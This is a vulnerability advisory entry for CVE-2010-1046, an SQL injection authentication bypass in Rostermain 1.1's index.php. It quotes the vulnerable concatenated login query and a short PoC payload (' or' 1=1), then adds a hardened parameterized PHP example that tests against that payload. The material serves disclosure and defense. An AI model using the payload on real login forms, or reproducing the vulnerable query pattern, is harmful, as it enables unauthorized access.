Rostermain 'index.php' Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1118978    Vulnerability type: SQL injection
Published: 2010-02-07    Updated: 2010-02-07
CVE ID: CVE-2010-1046    CNNVD-ID: CNNVD-201003-293
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/11356
https://www.securityfocus.com/bid/39935
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-293
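|Vulnerability Details
The index.php script in Rostermain contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via the (1) userid (username) and (2) password parameters.
|Exploit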
[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/


[+] Vuln Code : 

[index.php]

if ($_POST['userid'] && $_POST['password'])
{
  // if the user has just tried to log in
  $logquery = "select * from users "
           ."where username='$userid' "
           ." and passwd='$password' ";

[+] PoC : 

username :  ' or' 1=1
password :  ' or' 1=1
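
A hardened form of the login lookup quoted above, as an added example that is not part of the advisory or of Rostermain's code: the query is parameterized and the password is checked against a stored hash. The users/username/passwd names come from the quoted query; the check_login function, the DUMMY_HASH constant, the in-memory SQLite database and the sample account are assumptions constructed for illustration.

```php
<?php
// Added example (not Rostermain code). Table and column names follow the
// quoted query; everything else here is hypothetical and constructed.

// Hash verified when the username is unknown, so both paths do similar work.
define('DUMMY_HASH', password_hash('placeholder', PASSWORD_DEFAULT));

function check_login(PDO $db, string $userid, string $password): bool
{
    // The placeholder keeps $userid out of the SQL text: quotes and
    // keywords inside it are bound as data, never parsed as SQL.
    $stmt = $db->prepare('SELECT passwd FROM users WHERE username = :u');
    $stmt->execute([':u' => $userid]);
    $hash = $stmt->fetchColumn();

    if ($hash === false) {
        // No such user: still run one verification, then reject.
        password_verify($password, DUMMY_HASH);
        return false;
    }
    // The password never enters the query; it is compared to a stored hash.
    return password_verify($password, $hash);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, passwd TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (username, passwd) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The strings from the PoC section, used here only as test input.
$poc = "' or' 1=1";

$cases = [
    'valid credentials'      => ['alice', 'correct horse'],
    'PoC in both fields'     => [$poc, $poc],
    'PoC as password only'   => ['alice', $poc],
];
foreach ($cases as $label => [$user, $pass]) {
    printf("%-22s => %s\n", $label,
        check_login($db, $user, $pass) ? 'accepted' : 'rejected');
}
```

Run it with the PHP CLI with the pdo_sqlite extension enabled. The PoC strings reach the database only as bound values, so they are compared as a literal username rather than interpreted as part of the statement.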
|Affected Products
Ryan Marshall Rostermain 1.1
|References

Source: VUPEN
Name: ADV-2010-0318
Link: http://www.vupen.com/english/advisories/2010/0318
Source: MISC
Link: http://www.exploit-db.com/exploits/11356
Source: SECUNIA
Name: 38440
Link: http://secunia.com/advisories/38440
Source: OSVDB
Name: 62162
Link: http://osvdb.org/62162